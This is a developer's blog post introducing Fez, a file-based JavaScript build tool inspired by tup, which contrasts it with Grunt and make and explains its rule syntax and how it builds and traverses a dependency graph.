In the world of JavaScript build tools, Grunt is king. Grunt is a task-based build tool, meaning it has no sense of the dependency graph of a project. Tasks are run, one after the other, until there are no more tasks. Grunt excels in the current environment of compilation tools with unpredictable inputs and outputs. Since globs are only resolved when a previous task ends and a new task begins, a task can output whatever it wants, and the next task will pick up on the new files.

There are a few mechanisms, such as Grunt's watch, for rerunning tasks when files change, but even with watch, the entire task will be run. There are no checksums and no timestamp comparisons; Grunt just isn't concerned with minimizing work.

Developers have another option besides task-based tool like Grunt: file-based tools. File-based build tools are extremely popular; make is arguably the most well known and well used file-based build tool, but there are countless others. Rather than defining rulesets with a sequence of tasks to run one after the other to complete a build, a file-based tool allows the developer to define builds as transformational relationships between files. For example, rather than having a task that turns every CoffeeScript file into JavaScript, we look at each CoffeeScript file and create a transformation between the CoffeeScript input and an associated JavaScript output. The difference may seem subtle at first glance, but it becomes incredibly important in defining the nature of the build process.

In short, the idea of a file-based build tool isn't a new one, but it has fallen out of favor as developers have drifted away from the shell. Make andtup both require use of shell commands to transform files. The problem is that shells can be scary, especially for web developers who rarely venture outside of the browser. I think every developer should be a shell ninja, but I know that probably isn't going to happen. I would advocate that everyone just use make, but there will always be developers who are looking for a lower barrier to entry, and something which is based on tools that developers already know, such as JavaScript.

Enter Fez.

Fez is a file-based build tool I have been working on loosely based on tup and written in JavaScript. Fez takes the idea of a JavaScript build tool with pluggable operations from Grunt, but goes in a different direction. Builds are defined as sets of rules with three components: the input(s), the output(s), and the operation. An operation is just a function. Unlike Grunt, Fez doesn't do any magic plugin loading. You simply require() the operation function and pass it as an argument to a rule. Here is why this simple rule-based build definition system is awesome: we are able to glob the file system for an initial set of inputs, then construct the entire dependency graph from that set of inputs and the set of rules. For example, say we had the rules:

*.less → %f.css
*.css → %f.min.css
*.min.css → dist.min.css

And a few starting nodes we found on the file system:

Fez is able to construct the entire graph, from beginning to end, from just this information:

Now all we have to do is traverse the graph with a topological sort. We can introduce parallelization of operations where appropriate by executing them in child processes, and then waiting on convergence points. Fez, like make, compares timestamps of inputs and outputs during the graph traversal, allowing Fez to only do the work which needs to be done. Even cleaning the build is made awesome by the build graph: any node with one or more inputs is a generated node, and can be safely removed.

Fez is still pretty raw, but is already usable in real projects (and is being used in a few real projects!), but I would love to hear what people think. Check out the website, the GitHub repository, and/or join us in #fez on Freenode.

Viewing all 9433 articles
Browse latest View live